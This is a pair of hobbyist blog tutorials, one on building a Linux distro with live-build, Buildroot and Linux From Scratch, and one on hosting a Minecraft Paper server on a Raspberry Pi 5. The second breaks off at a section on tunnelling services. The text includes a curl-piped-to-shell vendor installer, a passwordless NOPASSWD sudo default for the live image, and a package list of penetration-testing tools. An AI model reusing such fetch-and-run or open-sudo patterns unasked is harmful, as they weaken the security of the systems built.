So You Want to Build Your Own Linux Distro
From ‘slightly cursed Ubuntu remix’ to full Linux From Scratch
So You Want to Build Your Own Linux Distro
Building your own Linux distro sounds like a mad scientist project, and in fairness, it is. It’s also one of the few exercises that genuinely teaches you how Linux fits together, end to end — kernel, init, libc, package format, bootloader, the lot.
This is the tutorial I wish I’d had when I first tried it: three paths, all with commands you can actually paste, versions you can pin, and the gotchas that cost me an evening so they don’t cost you one.
A small honesty note before we start. I’ve built and re-built the live-build and Buildroot examples below; they work on Debian 12 (bookworm) and a Raspberry Pi 4 respectively. The LFS section walks you through the LFS 12.x book — I’ll show you the shape of it and the bits that trip people up, but the book is the source of truth and the only sensible way to actually build it. I’m not pretending I compiled the universe between paragraphs.
Step 0: What Are You Actually Building?
“Make my own distro” is one phrase covering at least four different projects:
- A custom live ISO — Debian/Ubuntu plus your tools, configs, branding. Boots from USB, optionally installs. This is what most people actually want when they say “distro”. Effort: a weekend.
- An appliance image — a tiny, single-purpose OS for a router, kiosk, sensor, or Pi. Tens of MB, not GB. Ships on hardware. Effort: a weekend to a couple of weeks, depending on hardware quirks.
- A from-source system — Linux From Scratch. You compile every package yourself. Educational, slow, beautiful, occasionally infuriating. Effort: a long weekend if you’re fast and lucky, a fortnight of evenings if you’re mortal.
- A managed downstream distro — your own apt repo or OSTree stream that real users update from. This is a product, not a project, and it’s mostly the “how do updates work?” problem. Effort: ongoing, forever.
Pick the smallest version that solves your actual problem. You can always graduate.
What you’ll need on the host for everything below:
- A Linux box (Debian 12, Ubuntu 24.04, or Fedora 41+ all fine). 8 GB RAM minimum, 16 GB comfortable. 50 GB of free disk. An SSD if you value your sanity.
git,build-essential,qemu-system-x86,qemu-system-arm,xz-utils,bc,flex,bison,libssl-dev,libelf-dev,cpio.- A little patience for compiler output you’ll never read.
sudo apt update
sudo apt install -y git build-essential qemu-system-x86 qemu-system-arm \
xz-utils bc flex bison libssl-dev libelf-dev cpio rsync wget
Path 1: Remix Debian with live-build
This is the path most people actually want. You get a bootable hybrid ISO (USB or DVD), pre-loaded with your packages, your dotfiles, your wallpaper, and your slightly opinionated firewall defaults. It boots live and can also install to disk if you include debian-installer.
live-build is the official Debian toolchain for this. Ubuntu’s live-build is similar but a fork; the example below targets Debian 12 (bookworm). Cubic is a friendlier GUI wrapper if you want to click through it instead — under the hood it does the same things.
1.1 Install the tooling
sudo apt install -y live-build live-boot live-config debootstrap squashfs-tools \
xorriso isolinux syslinux-common memtest86+
1.2 Set up the project
Pick a working directory. I’ll use ~/distro/blinderlinux.
mkdir -p ~/distro/blinderlinux
cd ~/distro/blinderlinux
lb config \
--distribution bookworm \
--architectures amd64 \
--binary-images iso-hybrid \
--debian-installer live \
--archive-areas "main contrib non-free non-free-firmware" \
--apt-indices false \
--memtest memtest86+ \
--bootappend-live "boot=live components quiet splash hostname=blinder username=blinder"
lb config writes a config/ directory full of stub files. You don’t have to understand all of them yet; you just need to know which ones to edit.
What the flags actually buy you:
--distribution bookworm— Debian 12. Swap fortrixieif you want to live on Debian 13.--archive-areas "... non-free-firmware"— without this, your laptop’s wifi card won’t come up. Ask me how I know.--debian-installer live— adds a “Install” menu entry that uses the live system as the installer source. Drop it for live-only USBs.--bootappend-live— kernel cmdline for the live session. Theusernameandhostnamehere are what you’ll see at the prompt.
1.3 Pick your packages
Make a package list. The filename matters: .list.chroot means “install in the live filesystem”.
mkdir -p config/package-lists
cat > config/package-lists/blinder.list.chroot <<'EOF'
# baseline
sudo
openssh-server
curl
wget
git
vim
tmux
htop
# the actual reason we built this
nmap
tcpdump
wireshark
john
hashcat
hydra
sqlmap
gobuster
ffuf
seclists
# devops bits
docker.io
docker-compose
kubectl
helm
ansible
# desktop, if you want one
task-xfce-desktop
firefox-esr
EOF
If you don’t want a desktop, drop the last block and add --bootappend-live "... text" to start in TTY mode.
1.4 Bake in your config files
Anything under config/includes.chroot/ is copied verbatim into the live filesystem at the matching path. So:
mkdir -p config/includes.chroot/etc/skel
cat > config/includes.chroot/etc/skel/.bashrc <<'EOF'
export EDITOR=vim
alias ll='ls -lah --color=auto'
alias k='kubectl'
PS1='\[\e[35m\]\u@blinder\[\e[0m\]:\w\$ '
EOF
mkdir -p config/includes.chroot/etc/sudoers.d
cat > config/includes.chroot/etc/sudoers.d/90-blinder <<'EOF'
blinder ALL=(ALL) NOPASSWD: ALL
EOF
chmod 440 config/includes.chroot/etc/sudoers.d/90-blinder
For branding (wallpaper, plymouth theme, MOTD), drop files in the matching path under config/includes.chroot/. For example:
mkdir -p config/includes.chroot/usr/share/backgrounds/blinder
cp ~/Pictures/blinder-wallpaper.png \
config/includes.chroot/usr/share/backgrounds/blinder/default.png
1.5 Hooks for the things files can’t do
Hooks are shell scripts run inside the chroot during the build. Use them when “drop a file” isn’t enough — enabling services, generating SSH host keys, locking accounts, that kind of thing.
mkdir -p config/hooks/normal
cat > config/hooks/normal/9000-blinder.hook.chroot <<'EOF'
#!/bin/sh
set -e
# enable services
systemctl enable ssh
systemctl enable docker
# regen ssh host keys on first boot, not at build
rm -f /etc/ssh/ssh_host_*
cat > /etc/systemd/system/regen-ssh-host-keys.service <<'UNIT'
[Unit]
Description=Regenerate SSH host keys on first boot
ConditionPathExists=!/etc/ssh/ssh_host_ed25519_key
Before=ssh.service
[Service]
Type=oneshot
ExecStart=/usr/bin/ssh-keygen -A
[Install]
WantedBy=multi-user.target
UNIT
systemctl enable regen-ssh-host-keys.service
# minimal firewall
apt-get install -y ufw
ufw default deny incoming
ufw default allow outgoing
ufw allow 22/tcp
echo y | ufw enable || true
EOF
chmod +x config/hooks/normal/9000-blinder.hook.chroot
The naming convention matters: NNNN-name.hook.chroot runs in the chroot, .hook.binary runs against the final image. Numeric prefix sets order.
1.6 Build it
sudo lb build 2>&1 | tee build.log
First build takes 20–40 minutes depending on your bandwidth and how much you stuffed into the package list. Subsequent builds, with the local cache warm, take 5–10. Output is live-image-amd64.hybrid.iso in the project root.
1.7 Boot the result before you trust it
qemu-system-x86_64 \
-enable-kvm \
-m 4096 \
-smp 4 \
-cdrom live-image-amd64.hybrid.iso \
-boot d \
-display gtk
You should land at a Debian live boot menu. Pick the live entry, log in as blinder (no password), confirm your tools are installed, sshd is up, and ufw status shows the rules you wanted. If anything is off, fix the config, then:
sudo lb clean
sudo lb build
1.8 Common live-build gotchas
lb buildhalts on a missing package. Almost always a typo or a package that exists inmainbut you didn’t enablecontrib/non-free. Re-runlb configwith the right--archive-areas.- No wifi on real hardware. You forgot
non-free-firmware. Add it, rebuild. - Docker doesn’t start in the live session. Live images run with overlay roots; the default
overlay2storage driver tries to stack overlay-on-overlay and fails. In a hook, write/etc/docker/daemon.jsonwith{"storage-driver": "vfs"}for the live image. Slow but it boots. - ISO boots in QEMU but not on bare metal. Almost always the BIOS/UEFI mode mismatch.
iso-hybridis the right binary image type for both, but check the target machine’s firmware setting. - First boot is slow because of
ssh-keygen -A. That’s fine — that’s the regen service doing its job.
Path 2: Buildroot for an Appliance or Pi
Buildroot is a different beast. It’s not a remix; it’s a build system that produces a tailored, tiny rootfs from source. Ten to fifty MB, no apt, no systemd unless you ask for it. Perfect for embedded boxes, Pi-based appliances, and anything where you want to know every binary on the disk.
This walkthrough targets a Raspberry Pi 4 (64-bit). The same project tree builds for qemu-arm if you don’t have a Pi handy.
2.1 Get Buildroot
Pin a version. Buildroot does an LTS release every February and a regular release every quarter; LTS is the right pick unless you need a brand new package.
cd ~/distro
git clone https://gitlab.com/buildroot.org/buildroot.git
cd buildroot
git checkout 2025.02.x # current LTS at time of writing — check tags
2.2 Use an external tree, not the buildroot directory
This is the single most important Buildroot habit. Never edit anything inside buildroot/. All your customisations go in a separate “BR2_EXTERNAL” tree, so you can git pull Buildroot updates without merge hell.
mkdir -p ~/distro/blinder-br/{configs,board,package}
cd ~/distro/blinder-br
cat > external.desc <<'EOF'
name: BLINDER
desc: Blinder appliance external tree
EOF
cat > Config.in <<'EOF'
source "$BR2_EXTERNAL_BLINDER_PATH/package/blinder-firstboot/Config.in"
EOF
cat > external.mk <<'EOF'
include $(sort $(wildcard $(BR2_EXTERNAL_BLINDER_PATH)/package/*/*.mk))
EOF
2.3 Start from a defconfig
Buildroot ships defconfigs for hundreds of boards. For Pi 4 64-bit:
cd ~/distro/buildroot
make BR2_EXTERNAL=$HOME/distro/blinder-br raspberrypi4_64_defconfig
That seeds .config. Tweak it interactively:
make menuconfig
The bits worth flipping for a real appliance:
- Toolchain → C library → glibc unless size matters more than compatibility (then musl).
- System configuration → Init system → systemd if you want it; otherwise BusyBox init is fine and tiny.
- System configuration → Root password — set it now. Default is empty, which is awful.
- Target packages → Networking applications → openssh, dropbear, dhcpcd, wpa_supplicant.
- Filesystem images → ext4 root filesystem and squashfs if you want a read-only rootfs with overlay.
Save when done. Save the config back into your external tree so it’s versioned:
make BR2_DEFCONFIG=$HOME/distro/blinder-br/configs/blinder_defconfig savedefconfig
Next time anyone clones your tree:
make BR2_EXTERNAL=$HOME/distro/blinder-br blinder_defconfig
2.4 A custom package, properly
Pretend you want a tiny first-boot service that resizes the rootfs and writes a unique machine ID. Two files do it.
mkdir -p ~/distro/blinder-br/package/blinder-firstboot
cat > ~/distro/blinder-br/package/blinder-firstboot/Config.in <<'EOF'
config BR2_PACKAGE_BLINDER_FIRSTBOOT
bool "blinder-firstboot"
help
First-boot script: resize rootfs, generate machine-id.
EOF
cat > ~/distro/blinder-br/package/blinder-firstboot/blinder-firstboot.mk <<'EOF'
################################################################################
# blinder-firstboot
################################################################################
BLINDER_FIRSTBOOT_VERSION = 1.0
BLINDER_FIRSTBOOT_SITE = $(BR2_EXTERNAL_BLINDER_PATH)/package/blinder-firstboot/src
BLINDER_FIRSTBOOT_SITE_METHOD = local
define BLINDER_FIRSTBOOT_INSTALL_TARGET_CMDS
$(INSTALL) -D -m 0755 $(@D)/firstboot.sh \
$(TARGET_DIR)/usr/sbin/firstboot.sh
$(INSTALL) -D -m 0644 $(@D)/firstboot.service \
$(TARGET_DIR)/usr/lib/systemd/system/firstboot.service
endef
define BLINDER_FIRSTBOOT_INSTALL_INIT_SYSTEMD
$(INSTALL) -D -m 0644 $(@D)/firstboot.service \
$(TARGET_DIR)/usr/lib/systemd/system/firstboot.service
mkdir -p $(TARGET_DIR)/etc/systemd/system/multi-user.target.wants
ln -sf ../../../../usr/lib/systemd/system/firstboot.service \
$(TARGET_DIR)/etc/systemd/system/multi-user.target.wants/firstboot.service
endef
$(eval $(generic-package))
EOF
Then drop a real firstboot.sh and firstboot.service in package/blinder-firstboot/src/. After enabling the package in menuconfig, it’s baked into every image.
2.5 Rootfs overlays for static config
For one-off files (network config, MOTD, your CA cert), an overlay directory is faster than a package.
mkdir -p ~/distro/blinder-br/board/rpi4/rootfs-overlay/etc
echo "blinder-pi" > ~/distro/blinder-br/board/rpi4/rootfs-overlay/etc/hostname
Tell Buildroot where it is via menuconfig:
System configuration → Root filesystem overlay directories →
$(BR2_EXTERNAL_BLINDER_PATH)/board/rpi4/rootfs-overlay
2.6 Build
cd ~/distro/buildroot
make
First build: 30–90 minutes depending on your CPU and the package count. Subsequent builds are minutes. Output lands in output/images/:
Image— the kernelbcm2711-rpi-4-b.dtb— device tree for Pi 4rootfs.ext4— the root filesystemsdcard.img— a complete bootable SD image (this is the one you flash)
2.7 Boot the result
For a real Pi:
sudo dd if=output/images/sdcard.img of=/dev/sdX bs=4M conv=fsync status=progress
sync
Replace /dev/sdX with your SD card. Get this wrong and you’ll overwrite your laptop. Read it twice.
For qemu-arm (handier for iteration), use a Buildroot defconfig with QEMU support: qemu_aarch64_virt_defconfig instead of the Pi one. Then:
qemu-system-aarch64 \
-M virt -cpu cortex-a72 -m 1024 -smp 2 \
-kernel output/images/Image \
-drive file=output/images/rootfs.ext4,if=none,format=raw,id=hd0 \
-device virtio-blk-device,drive=hd0 \
-append "root=/dev/vda console=ttyAMA0" \
-nographic
You’ll get a serial console boot. Log in as root with the password you set. Ctrl-A x to quit qemu.
2.8 Common Buildroot gotchas
- You edited a file in
buildroot/. It’ll get clobbered. Move it to your external tree. make cleandoesn’t do what you think. It nukesoutput/, including downloaded sources. For a quick rebuild of one package,make <pkg>-rebuild. For a full clean,make distclean(slower, but consistent).- The image works in qemu but not on the Pi. The defconfig matters:
raspberrypi4_64_defconfigfor the 4, not the same for the 5. Check the right defconfig for your board. - First boot hangs at “Waiting for /dev/mmcblk0p2”. Almost always a too-small SD image. Resize via a
BR2_ROOTFS_POST_IMAGE_SCRIPTor expand on first boot. - You changed
.configby hand and lost it. That’s why you save it back toconfigs/blinder_defconfigafter every meaningful change.
Path 3: Linux From Scratch (the real one)
LFS is the “compile every package by hand” path. It takes a fortnight of evenings if you’re mortal, and you’ll learn more about Linux than any book or course can teach you. The LFS book is the actual tutorial — it has exact commands, exact patches, exact md5sums. What I’ll do here is the meta-tutorial: the shape of it, the parts that catch people out, and how to not waste a week.
3.1 What you’re actually building
LFS produces a minimal, bootable Linux system using only source code. No package manager, no graphical environment, no network manager. Roughly 800 MB of system, built from ~80 source tarballs over ~30 hours of compile time on a decent laptop.
After LFS, BLFS (Beyond LFS) layers desktops, browsers, and services on top. ALFS (Automated LFS) lets you script the whole thing once you’ve done it manually and want to reproduce it.
3.2 Host requirements
LFS provides a version-check.sh script. Run it on your build host before you do anything else. It checks gcc, make, bash, perl, etc. are all new enough.
Other prep:
- A dedicated partition or LVM volume of at least 30 GB, formatted ext4. You can use a loopback file for the first attempt to keep your laptop intact.
- A dedicated unprivileged build user, conventionally
lfs, with a sanitised environment (the book’s~/.bash_profileand~/.bashrcare not optional — they prevent host pollution from leaking into your toolchain).
# As root, set up the partition and user
mount /dev/sdY1 /mnt/lfs
useradd -s /bin/bash -m -k /dev/null lfs
chown -v lfs /mnt/lfs
su - lfs
3.3 The phases, in order
LFS chapters group into phases. You will spend a different amount of pain on each.
- Prepare host (ch. 2–4) — partition, user, env, sources tarball.
- Cross toolchain (ch. 5) — build binutils-pass1, gcc-pass1, linux headers, glibc, libstdc++. This is the most fragile part. If something fails here, stop and fix it. Compounding errors downstream will eat your weekend.
- Cross-compile temporary tools (ch. 6) — m4, ncurses, bash, coreutils, etc., all linked against the new toolchain.
- Enter the chroot (ch. 7) — at this point
/mnt/lfsis self-hosting enough that youchrootinto it and continue from inside. - Build the final system (ch. 8) — every package, properly, in the order the book gives. This is the long bit. Don’t reorder. Don’t skip patches.
- System configuration (ch. 9) — fstab, hostname, network, locale, /etc/hosts.
- Kernel and bootloader (ch. 10) —
make menuconfigfor the kernel, GRUB to boot it. - Reboot, log in, feel something (ch. 11) — that’s your distro.
3.4 The four mistakes that cost everyone a day
- Skipping the version-check. A host gcc that’s too new or too old produces a temporary toolchain that subtly miscompiles glibc later. Run the script.
- Not using the recommended
~/.bash_profile. Without it, your temporary build picks up/usr/libfrom the host. You end up with an LFS that links against the host’s libc and crashes the moment you boot it standalone. - Running
make -j$(nproc)forglibcinstall. Some packages (glibc’smake install, for one) have race conditions in their install rules. Usemake(no-j) for installs. - Editing the kernel
.configwithout reading what’s on. The book gives you a working baseline. Trim later, once you’ve booted once.
3.5 How long is this actually going to take?
Realistic on a modern laptop with MAKEFLAGS='-j8':
| Phase | Hands-on | Wall-clock |
|---|---|---|
| Host prep | 30 min | 30 min |
| Cross toolchain (ch. 5) | 1 hr | 2–3 hr |
| Temporary tools (ch. 6) | 1 hr | 2–3 hr |
| Chroot setup (ch. 7) | 30 min | 30 min |
| Final system (ch. 8) | 4–6 hr | 10–18 hr |
| System config (ch. 9) | 1 hr | 1 hr |
| Kernel + GRUB (ch. 10) | 1 hr | 2 hr |
| Total | ~10 hr | 18–28 hr |
Set up tmux (see The Tool That Makes Your Terminal Feel Like a Cockpit when it publishes) and treat it as background work over a long weekend.
3.6 When you’re ready, the book is the only thing you should be following
I can’t reproduce the LFS book in a blog post, and you shouldn’t want me to — it’s 350+ pages and gets revised every six months. Bookmark it, work top-to-bottom, and when something fails, the LFS errata page is where the fixes live.
Cross-Cutting: Hardening, Updates, and Reproducibility
Three things matter regardless of path.
Hardening
Whichever route you took, you can bake in:
- Minimal package set. Every package is attack surface. If you don’t need
telnet,rsh,nfs-server, don’t install them. live-build and Buildroot make this trivial; LFS makes it the default. - Kernel hardening. KASLR on,
CONFIG_SLAB_FREELIST_HARDENED,CONFIG_SLAB_FREELIST_RANDOM, lockdown mode, module signing. The Kernel Self-Protection Project wiki has a current recommended config. - MAC layer. AppArmor on Debian/Ubuntu remixes (it’s already there, just enable profiles). SELinux on RHEL-flavoured. On Buildroot/LFS, decide before you build — bolting it on later is annoying.
- Sane defaults. No empty root password (Buildroot default — change it). UFW or nftables enabled with deny-incoming. SSH key-only. Auto-updates on, or a clear update story (see below).
- Threat model the thing. Who’s using it, where, against whom? A pentest-USB and a kiosk for a public lobby have very different threat models. Don’t pretend they don’t.
Updates: the actual hard problem
This is the bit most “build a distro” tutorials skip, and it’s where real distros live or die.
- Live ISO, refreshed periodically. Easy. You rebuild the ISO every month, users re-flash a USB. Fine for training/event use. Useless for fleets.
- apt repo of your own. You build, sign, and host packages.
repreprooraptlyare the tools. You inherit Debian’s security-update cadence for the base. You become responsible for everything you’ve added on top, including CVE patching and signing. - Image-based updates (A/B partitions). Two root partitions, swap-and-reboot atomic upgrades, automatic rollback on boot failure. Mender, RAUC, or SWUpdate for the orchestration. This is what serious appliances do.
- OSTree / image-based desktops. rpm-ostree (Fedora Silverblue) and bootc are where Linux desktop is heading. Atomic upgrades, easy rollback, declarative state. Worth a look if you’re going to maintain this for years.
Pick a story before you ship. Distros without an update story become liabilities the day after the first CVE drops.
Reproducibility
If you can’t rebuild last month’s image and get the same bytes (or close to it), you don’t really know what you shipped.
- Pin versions. Debian release codename, Buildroot tag, LFS book version, kernel commit.
- Vendor your sources. Either a local mirror or hashes in your build system.
- Script everything.
live-buildconfigs go in git. Buildroot external tree goes in git. Even your LFS notes go in git. - Stamp the image.
/etc/blinder-releasewith build date, git commit, and config hash. Future-you will thank present-you when something boots weirdly and you have no idea which version it is.
Iteration: How to Not Lose a Weekend
Three habits I’ve learnt the slow way.
- Test in a VM first, every single build. QEMU boot in a script that runs after every successful build. Catches 80% of regressions in 30 seconds.
- Keep a known-good image. When you’ve got a build that boots and works, copy the ISO/image to a
known-good/directory with the date. When the next build won’t boot at 1am, you’ve got something to compare against. - Commit between every change.
live-buildand Buildroot configs are tiny. Commit per tweak.git bisectwill find the change that broke boot in five minutes.
Final Thought
Building your own distro won’t impress anyone at the pub. It will, quietly, change how you read every other Linux thing for the rest of your career — kernel panics, container layers, cloud-init quirks, package-manager weirdness. You stop seeing Linux as a thing that came from somewhere and start seeing it as a thing you assemble.
Start with live-build if you want a USB you can hand to a colleague on Monday. Reach for Buildroot if your distro is really firmware. Climb LFS once, slowly, when you’ve got a fortnight and a good chair.
Either way, the next time someone says “just install Ubuntu,” you’ll know exactly how much that sentence is hiding.
![]()
Running a Game Server on a Raspberry Pi 5
Tiny board, shared worlds, big grin
Running a Game Server on a Raspberry Pi 5
A Pi 5 is the sweet spot between “I own a data centre” and “I’ve wedged a laptop under the telly.” It’s the first Pi with enough grunt that you can host a real Minecraft server for your mates without it bursting into flames or chunking its way through every player movement.
This post is the working tutorial: hardware that actually matters, a Paper server installed properly, JVM flags that don’t embarrass you, a systemd unit that survives reboots and crashes, RCON-driven backups, and three increasingly sensible ways to let friends connect. I’ve run this exact build on an 8 GB Pi 5 with NVMe and an active cooler since the start of 2026 — six players, four chunks of view distance, idles at 25–35% CPU, peaks around 80% during big builds.
We’ll focus on Minecraft Java because it’s the classic case. Three other Pi-friendly games go at the bottom.
What You Actually Need (Beyond a Pi 5)
The Pi 5 itself is fine. The problem is that out of the box, two things will bite you. Plan for both.
- An active cooler. Without it, the Pi 5 throttles down to ~1.5 GHz under sustained load. The official Raspberry Pi Active Cooler is £5 and clips on; a case with a built-in fan (Argon NEO 5, Flirc) is fine too. Passive heatsinks are not enough for a 24/7 server.
- An NVMe SSD, not an SD card. Minecraft’s chunk I/O murders SD cards within months and is the single biggest source of lag spikes on a Pi server. The official Raspberry Pi M.2 HAT+ takes a 2230/2242 NVMe drive over the Pi 5’s PCIe lane. Pimoroni’s NVMe Base and the 52Pi P02 are the same idea. A 256 GB NVMe is plenty.
- 8 GB RAM minimum. 4 GB works for two players; 16 GB is overkill for a Java server but lets you run a Velocity proxy or other services alongside.
- Wired Ethernet. Wi-Fi works but adds 2–10 ms of jitter that players feel.
- A real PSU. The official 27 W USB-C PSU. The Pi 5 will silently underclock with anything weaker.
Total kit cost as of writing: around £130–£160 with NVMe.
Boot the Pi from NVMe (Once, Properly)
You want NVMe-only boot, not “SD card with the rootfs on the NVMe” fragility.
Flash Raspberry Pi OS Lite (64-bit, Bookworm) onto the NVMe with rpi-imager. In the imager’s settings cog: enable SSH (key auth), set hostname (mcpi), set username, set Wi-Fi only as a fallback.
First boot the Pi from an SD card to update the bootloader and switch boot order:
sudo apt update && sudo apt full-upgrade -y
sudo rpi-eeprom-update -a
sudo raspi-config
# Advanced Options → Bootloader Version → Latest
# Advanced Options → Boot Order → NVMe/USB Boot
sudo reboot
Power off, remove the SD card, boot from NVMe. From here on everything is on the SSD.
Then, on the Pi, lock down the basics:
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y ufw fail2ban htop tmux unattended-upgrades
sudo dpkg-reconfigure --priority=low unattended-upgrades
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow from 192.168.0.0/16 to any port 22 proto tcp
sudo ufw enable
Give the Pi a static IP via your router’s DHCP reservation — players need a stable address, and a moving target breaks every backup script.
Pick a Server Flavour
You have three sensible choices.
- Vanilla (Mojang official) — slowest, no plugins, fine for two friends and a quiet world.
- Paper — Spigot fork with serious performance work and a healthy plugin ecosystem. Default pick for a Pi.
- Purpur — Paper fork with extra config knobs and gameplay tweaks. Same performance, more rope to hang yourself with. Pick once you know you want a specific Purpur feature.
We’ll use Paper. Same systemd unit, RCON, and backup story applies to Purpur if you swap it later.
Install Paper Properly
Paper 1.21+ requires Java 21. JDK 17 is the wrong answer in 2026 — openjdk-17 will start the server and then quietly refuse to load 1.21 worlds.
sudo apt install -y openjdk-21-jre-headless curl jq
java -version # expect 21.x
Create a dedicated, login-disabled user:
sudo adduser --system --home /opt/minecraft --group --disabled-login minecraft
sudo install -d -o minecraft -g minecraft /opt/minecraft/server
Fetch the latest Paper build via their API. This script grabs the newest stable build for whatever Minecraft version you set — no scraping, no broken links.
sudo -u minecraft bash <<'EOF'
set -euo pipefail
cd /opt/minecraft/server
MC_VERSION="1.21.4" # bump when you want to update; check papermc.io for current
BUILD=$(curl -s "https://api.papermc.io/v2/projects/paper/versions/${MC_VERSION}/builds" \
| jq -r '[.builds[] | select(.channel=="default")][-1].build')
JAR="paper-${MC_VERSION}-${BUILD}.jar"
curl -sLo "${JAR}" \
"https://api.papermc.io/v2/projects/paper/versions/${MC_VERSION}/builds/${BUILD}/downloads/${JAR}"
ln -sf "${JAR}" paper.jar
echo "Installed ${JAR}"
EOF
Accept the EULA (read it once, then this is fine):
sudo -u minecraft tee /opt/minecraft/server/eula.txt > /dev/null <<'EOF'
eula=true
EOF
First run — generates server.properties and the world. Stop it as soon as it says “Done”:
sudo -u minecraft bash -c 'cd /opt/minecraft/server && \
java -Xms2G -Xmx4G -jar paper.jar nogui'
# wait for "Done", then type: stop
Tune server.properties for a Pi
Edit /opt/minecraft/server/server.properties. The lines that matter for a Pi:
view-distance=6
simulation-distance=4
max-players=8
network-compression-threshold=256
sync-chunk-writes=false
entity-broadcast-range-percentage=80
spawn-protection=0
enable-rcon=true
rcon.port=25575
rcon.password=CHANGE_ME_TO_A_LONG_RANDOM_STRING
broadcast-rcon-to-ops=false
online-mode=true
white-list=true
enforce-whitelist=true
Why each one:
view-distance=6is the visual radius. Each step up is roughly quadratic CPU. 6 looks good and stays cheap.simulation-distance=4is what the server actually ticks. Keeping it lower than view distance is the single biggest performance win.network-compression-threshold=256saves CPU on a LAN. Lower (default 256, raise to 512) if you’re running over the internet.sync-chunk-writes=falseis safe on NVMe and removes a stutter source. Don’t disable it on an SD card.enforce-whitelist=trueis the difference between “my mates and I” and “anyone who finds my IP”.
Generate a strong RCON password:
openssl rand -hex 24
Paste it in, also stash it somewhere safe — you’ll use it from the systemd shutdown hook and the backup script.
Add yourself and your mates to the whitelist. With the server stopped:
sudo -u minecraft tee /opt/minecraft/server/whitelist.json > /dev/null <<'EOF'
[
{ "uuid": "00000000-0000-0000-0000-000000000000", "name": "geekyblinder" }
]
EOF
(Look up real UUIDs at mcuuid.net or just let the server populate whitelist.json after you whitelist add <name> from the console.)
A systemd Unit That Doesn’t Embarrass You
Aikar’s flags are the well-tested JVM tuning for Paper-family servers. Use them. Match -Xms and -Xmx to give the JVM a fixed heap — variable heap on a Pi causes long GC pauses.
For an 8 GB Pi with nothing else running, allocate 6 GB to the heap (leave 2 GB for the kernel and disk cache). For a 4 GB Pi, allocate 2.5 GB.
Create /etc/systemd/system/minecraft.service:
[Unit]
Description=Minecraft Paper Server
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
User=minecraft
Group=minecraft
WorkingDirectory=/opt/minecraft/server
ExecStart=/usr/bin/java \
-Xms6G -Xmx6G \
-XX:+UseG1GC \
-XX:+ParallelRefProcEnabled \
-XX:MaxGCPauseMillis=200 \
-XX:+UnlockExperimentalVMOptions \
-XX:+DisableExplicitGC \
-XX:+AlwaysPreTouch \
-XX:G1HeapWastePercent=5 \
-XX:G1MixedGCCountTarget=4 \
-XX:G1NewSizePercent=30 \
-XX:G1MaxNewSizePercent=40 \
-XX:G1HeapRegionSize=8M \
-XX:G1ReservePercent=20 \
-XX:G1MixedGCLiveThresholdPercent=90 \
-XX:G1RSetUpdatingPauseTimePercent=5 \
-XX:SurvivorRatio=32 \
-XX:+PerfDisableSharedMem \
-XX:MaxTenuringThreshold=1 \
-Dusing.aikars.flags=https://mcflags.emc.gs \
-Daikars.new.flags=true \
-jar paper.jar nogui
ExecStop=/usr/local/bin/mcrcon-stop
Restart=on-failure
RestartSec=10s
TimeoutStopSec=60s
# hardening
NoNewPrivileges=true
ProtectSystem=strict
ProtectHome=true
PrivateTmp=true
PrivateDevices=true
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
RestrictSUIDSGID=true
LockPersonality=true
ReadWritePaths=/opt/minecraft
[Install]
WantedBy=multi-user.target
The ExecStop script does a clean RCON shutdown — save-all flush then stop — so the world is consistent on disk. We’ll write that next.
RCON: Live Admin and Clean Shutdowns
Install mcrcon:
sudo apt install -y build-essential
git clone https://github.com/Tiiffi/mcrcon.git /tmp/mcrcon
cd /tmp/mcrcon && make && sudo install -m 0755 mcrcon /usr/local/bin/
Stash the password in a root-readable file:
sudo install -d -m 0700 /etc/minecraft
echo 'CHANGE_ME_TO_A_LONG_RANDOM_STRING' | \
sudo tee /etc/minecraft/rcon.pass > /dev/null
sudo chmod 0600 /etc/minecraft/rcon.pass
The clean-shutdown helper, /usr/local/bin/mcrcon-stop:
#!/bin/bash
set -e
PASS=$(cat /etc/minecraft/rcon.pass)
mcrcon -H 127.0.0.1 -P 25575 -p "$PASS" \
"say Server stopping in 10 seconds..." \
"save-all flush" \
"save-off"
sleep 10
mcrcon -H 127.0.0.1 -P 25575 -p "$PASS" "stop"
sudo chmod 0755 /usr/local/bin/mcrcon-stop
Now bring it up:
sudo systemctl daemon-reload
sudo systemctl enable --now minecraft
sudo systemctl status minecraft
sudo journalctl -u minecraft -f
Live admin from the Pi (no need to attach to the console):
mcrcon -H 127.0.0.1 -P 25575 -p "$(sudo cat /etc/minecraft/rcon.pass)" \
"list"
Backups That Actually Restore
The world on disk is not consistent if you cp it while the server is running. The fix is to flush state via RCON, copy the world, then turn writes back on. Here’s /usr/local/bin/mc-backup:
#!/bin/bash
set -euo pipefail
WORLD_DIR=/opt/minecraft/server
BACKUP_DIR=/mnt/backups/minecraft
RCON_PASS=$(cat /etc/minecraft/rcon.pass)
STAMP=$(date +%Y%m%d-%H%M%S)
ARCHIVE="${BACKUP_DIR}/world-${STAMP}.tar.zst"
mkdir -p "$BACKUP_DIR"
# flush, then freeze writes
mcrcon -H 127.0.0.1 -P 25575 -p "$RCON_PASS" \
"say Backup starting" "save-off" "save-all flush"
trap 'mcrcon -H 127.0.0.1 -P 25575 -p "$RCON_PASS" "save-on" "say Backup finished" || true' EXIT
tar --use-compress-program=zstd -cf "$ARCHIVE" \
-C "$WORLD_DIR" world world_nether world_the_end \
server.properties whitelist.json ops.json banned-players.json banned-ips.json
# keep last 14 daily snapshots
find "$BACKUP_DIR" -name 'world-*.tar.zst' -mtime +14 -delete
sudo chmod 0755 /usr/local/bin/mc-backup
Schedule it via cron — not on the minecraft user, on root, since we want predictable PATH and exit codes:
sudo crontab -e
# every day at 04:30
30 4 * * * /usr/local/bin/mc-backup >> /var/log/mc-backup.log 2>&1
Mount /mnt/backups from somewhere off the Pi — a NAS via NFS, an external SSD, or push the archives off-site with restic or rclone. A backup that lives on the same disk as the world isn’t a backup; it’s a slightly delayed loss.
Letting Friends Join, Ranked by Sensibleness
Best: Tailscale
Spin up Tailscale on the Pi and on your friends’ machines. Everyone gets a stable 100.x.x.x address; friends connect to mcpi (or the tailnet IP) on port 25565. No port forwarding, no exposing your home IP, end-to-end encrypted, free for personal use up to ~100 nodes.
curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up --ssh
Share the tailnet with your mates from the Tailscale admin console. They install Tailscale, accept the share, and join your server with the tailnet hostname.
Middle: a tunneling service (playit.gg, ngrok)
